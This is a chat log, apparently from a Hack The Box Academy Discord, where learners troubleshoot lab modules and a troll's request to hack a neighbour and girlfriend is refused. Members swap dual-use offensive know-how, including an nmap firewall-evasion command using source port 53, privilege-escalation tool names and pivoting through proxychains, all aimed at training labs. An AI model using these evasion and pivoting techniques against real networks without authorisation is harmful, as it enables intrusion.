No
don't ask for these things in public forums, general, dont ask for these kind of things
if anyone has a solution to my problem 🥲 well it's not really a problem because i found the flag but i don't understand why the flag is not persistent
okay so I'll go cry in the corner
but i want it gone it's embarrassing
In Attacking Enterprise Networks I try to connect to the sites I found. In my kali it does not connect at all, but in the VM of HTB it does connect. How can I fix it? I really want to do this on my machine! thanks!
aahh
we gave you all the solutions without being mean, really try to contact the support, you've nothing to lose
Did you connect to the openvpn in your kali vm?
vpn
alrr thankyou
sudo openvpn yourvpnfile
Yes of course... and its connecting.. I can ping the IP address they give. but cannot access the sites. (I also added them to /etc/hosts)
think positively, maybe its good instagram is gone.
true af
refresh or change VPN
ya
Hi, I'm getting stuck on the NMAP module, hard lab (Firewall/IDS/IPS Evasion).
||I assumed, after the medium lab, that I still had to find how to get the DNS service version, just now it's harder obviously. After a few nmaps, I can confirm that the UDP 53 port is now closed, and DNS has switched to the TCP 53 port, which is filtered, but I just can't find a way to bypass the firewall. I tried decoy, -sA, -sS, source port 53, to no avail.
I tried to use a proxy in the target network, but enum only returns the target system as up. I also tried the "firewalk" and "firewall-bypass", but it didn't work.||
So now I'm out of options, tbh. If someone has a hint of any sort, maybe it would help.
did that...
make sure pwnbox is not active.
i dont know...
oh yeah you can only have either one
the pwnbox or the openvpn connection
did you really try ||source port 53||?
Tried that too.. really Im lost haha..
Yes. Worked in medium lab, but not in hard.
put many ip
why are you using -g 53?
Try to shut down the pwnbox while connected to your kali via openvpn, it doesn't like concurrent connections iirc
-g is source port, it's equivalent of --source-port
For me, there is no difference
use syntax ||--source-port 53 <target ip>||
I just did just in case, but still the same. I don't think the order of the options matters.
can you send the nmap command here? i can copy it and try it.
||sudo nmap -n -Pn --disable-arp-ping --source-port 53 10.129.110.83 -p 53 -sV -sA --packet-trace||
Nmap doesn't require your arguments to be in a specific order
You can do nmap -vvv 10.229.x.x -sC -oN output -sV and itll run
Hi guys new member here. I currently enrolled to crack into htb path and im at service scanning and i have to nmap an ip so i can see what ports are open to answer some questions. The problem is this:
Nmap scan report for 10.129.223.49
Host is up (0.00051s latency).
All 1000 scanned ports on 10.129.223.49 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.23 seconds
good to know i did not notice
check if you are connected to the vpn
ping the target
try the nmap again w/ -Pn
you are only targeting port 53, which is indeed filtered. so try without it. why focusing on single port it's probably closed?
In the medium lab, we're supposed to get the dns service version. The hard lab mentions that now, the service is better protected and that we need to get the version still. So I checked the UDP again, which is clearly closed, so I switched to TCP. If it were closed, I'd get a RST flag in response, but I don't get any response, so I assumed it was filtered by firewall, which we're supposed to get through
(I also tried port 5353 for good measure, but this one is closed)
remember, the task itself, does not specify dns service, so be open to more than Dns.
The only open ports I found are ||SSH and HTTP||, which were too easy to get the version of, it can't be the answer
you are close but specifically using -p 53 is limiting the scan to only dns port, which is shown filtered not useful, or i'd rather say, meaningless
I supposed there was a way to get through the filter, but I guess it was a wrong idea, I'll check other options.
Try that Assumption.
Meh. I triggered the IPS. I have to wait to try again.
you can simply reset the target
Well, it's only 3 min
well, reset is only 30 seconds
But the counter starts at 45/75, where waiting takes it down to 0
alright
good, now delete it, and continue with the task.
Information gathering, Subdomain enumeration; Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com. im stuck at this.
all 1000 scanned ports ...
Does the reading material suggest any ways to scan more than 1000 ports? Looks like the host is responding to ping requests so it's not a technical issue.
maybe it is that i didnt connect to vpn?
It's registering the host as "up" so I wouldn't think VPN is the issue
I also saw a walkthough and he just run: nmap -sV <ip>
Yes, I didn't even turn the pwnbox on.. the thing is when I ping or do any command in the terminal it works and shows connection, but when I try to see the sites in the browser or curl then it gets stuck.. for example: ping 10.129.x.x - works.. curl blog.inlanefreight.local - doesn't.. (and I added them to /etc/hosts
if host is responding with ping, then connection is fine.
It is also the first exercise with a vpn-connection file attached thats why im asking
-sV doesn't scan more or fewer ips. Check again or skim the reading material.
I don't have it up. You can try restarting the VPN. That sometimes fixes technicality issues. I can sanity check for you in an hour if it's still an issue. I'll ping you back at that time.
#modules stuck in win privesc sedebugprivilege and setakeownershipprivilege. Can't get the required privileges . tried Enable-Privilege.ps1 and the other one also tried Fullpowers.exe. none of them worked
run as admin
wait,
do We have to manually enable a specific privilege for us from admin cmd prompt and then try to abuse that from non admin prompt ?
no just use the admin prompt
why do I have to use admin prompt ? any specific reason ?
it's just a UAC thing
oh !
my mistake. I forgot to check the local administrators group.
One thing , I am in local administrators group but can't do some administrative task for eg adding a user or change other user's pass. why is this ?
hello guyes can you teach me hacking please i want to hack my neighbour because he dont let me play football outside and i also want to hack my girlfriend to see if she is cheating on me . because she keep telling me that i like potatoes but i dont and keep calling me baby but my name is dipratasta please help me iam very good nice personnnn
i think i found the answer but not sure the way of putting it correctly.
If you were a good nice person you wouldn't hack your neighbor
Also that would be illegal
no you dont understand my nieghbour is a very bad bad person he is evil
Still illegal anyway skiddo
but i couldnt write on general that why im typing here
but why are you mean what did i do to you
@daring nebula you're not in the right place for this. Please do not ask for illegal things as mentioned by other members.
Hey stupid question but how do I verify my account
but why are you swearing you should be banned for that
Not against the rules to swear
at #bot-commands do /verify
ok but try to be nice damn
Thanks! Appreciate mighty kind of you
You're welcome
This is me being nice about you asking for illegal things
im sorry sir but i dont think i made something wrong
Yes, you did. You're asking for things that are illegal and against Discord ToS.
but my girlfriend she is cheating on me that is also illegal
Cheating isn't illegal
so you are also a girl right
Immoral, sure. Illegal, no
This guy is trolling lmao
what do you mean
It's why I'm not fully engaging
Just seeing how creative the troll is
Such actions are against the computer fraud and abuse act
"she keep telling me that I like potatoes"
i think you are the way you was talking to me feel like you want to give me some punshes
Likely a language barrier thing, or they're a misguided teen
i can send you a screenshot if you want
It's something
Either way
We don't want that. It's a you-problem @daring nebula , this is about Hack The Box and not about hacking your neighbour/girlfriend
ok sorry
can you teach me hacking now for protection . i dont think this guyes like me and i think they are planning to destroy my computer
@storm elk could you help with this?
No.
dm me
Learn using the HTB academy if you wanna learn Ethical hacking.
ok fineeee can you tell them not heckk meee
If you're afraid, talk to your parents or legal authorities.
Nobody is gonna hack you lol
i dont think this gonna help
back in old days, trolls like such was immediately kicked off by moderators on amino platform.
yes they are im sure
Can I open a ticket to discuss something with you
I'm not on the support system on the website. Just a moderator on Discord
is that freeee
No
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
There are some free modules on htb academy
But you're gonna need the cubes to get the real spicy stuff
lol @ spicy stuff
But mostly everything you learn in academy can be found somewhere else on the internet for free (at a lower quality)
ok thank you guyes im gonna learn hacking so that i will hack my girlfriend and neiighbour and show them my hacking aura and skillss
Oh no it's a discord linking issue
nope, you need to invest time and brain. it's not one day or 1 month job, or even one 1year job
Oh in that case, dm me
Your aura will be behind bars dude
God bless you
let's not forget, that is how basically we were curious to learn to hack. not necessarily hacking gf though, lol
not me
yeah
the condition, requires having gf. rip me
I got curious because it seemed interesting, not to hack gf or neighbors
You lost me at the requirement of having a gf
Hacking takes time though, and I've seen tons of people quit because it can be too much, by the time he could learn how to hack his neighbors would have moved out lol
And his gf would have left him 
by the time one learns hacking, having girlfriend is a liability, as for time.
"Stop spending 10 hours a day on hack the box!"
"who you are talking to for so long? who is THIS MARCIELEE"
NEVER I HAVE TO GET MY CPTS
"But honey I need to solve this seasonal box I've been working on for 27 hours"
"your honor, plaintiff spends more time with his pc than his wife"
"Doing HTB? Case dismissed, he's not guilty"
cough keep it #module related cough
Oh I guess I could use some help with an academy module
Uh so modules
For one pivoting using proxy chains is kinda confusing
i could go on with your honor comments, but lets not make it irrelevant chat.
How does it work under the hood?
go ligolo-ng and never go back
dm everyday dm
It creates a connection that sends traffic destined for one port, back to your machine
Or to the next hop in the chain
sorry, thought I responded, just an fyi, I am working as well :p
Oh so like a port forward?
Yes
Pivoting is just using a port forward to access another machine internally
Can be a higher/lower/same privilege machine that you pivot to
So then could i theoretically use multiple machines in a network as pivot points?
Yep
Because by the same token that sends traffic back to you, you can also use that access point to scan/access other points in the network
You're creating your own network tunnel
I see thank you.
On that note, what would be a good practice machine for CPTS? I kinda am coming back from a long hiatus.
Just do the AEN blind if you've already done the course, no single machine will be helpful as CPTS is a networked environment
Just spin up and get DA
No reading questions or sections
Let's get it, I guess.
Anything you struggle on is what modules you should revisit
web fuzzing module - API Fuzzing - Question : What is the value returned by the endpoint that the api fuzzer has identified? - I tries multiple wordlists (api_endpoint.txt,common.txt,etc) and found 3-4 directories/api after checking the content of it using "curl" I get the source code, a flag or some other directories... I even tries "-recursion" but I dont know what am i looking for ?? like what value am I looking for - I am sure I have tries every thing That I have found... What is this "value" I am looking for ?? Please help
So pivoting and ad and reporting
Once you identify the endpoint and curl it...
The response from curl is what the answer is
A directory isn't an api btw
An API, is an application programming interface. You make a request to an API and it runs some code in an application and returns a result
@spark monolith Figure this out; what are the module and section titles?
By fuzzing an API, you attempt to try to find out hidden or otherwise unknown info to you, the attacker, by trying out random words or phrases
When you curl it you'll get json output that's
{"flag":"value"}
This is of course different from directory brute forcing as you are trying to retrieve a directory by using a wordlist
In this case the objective is to find an api endpoint not fuzz for accepted values
Oh my mistake
Which the module provides a tool link for
I get stuff like "{"detail":[{"type":"int_parsing","loc":["path","item_id"],"msg":"Input should be a valid integer, unable to parse string as an integer","input":"v1"}]}"
Well you're looking at the wrong place then
Are you using the api fuzzer the module linked?
I tried it already... Its showing this error
I tried "python3" its showing same error
guyes what is ip ddress
nah i left it cause something came up. Its the crack into hack the box path: service scanning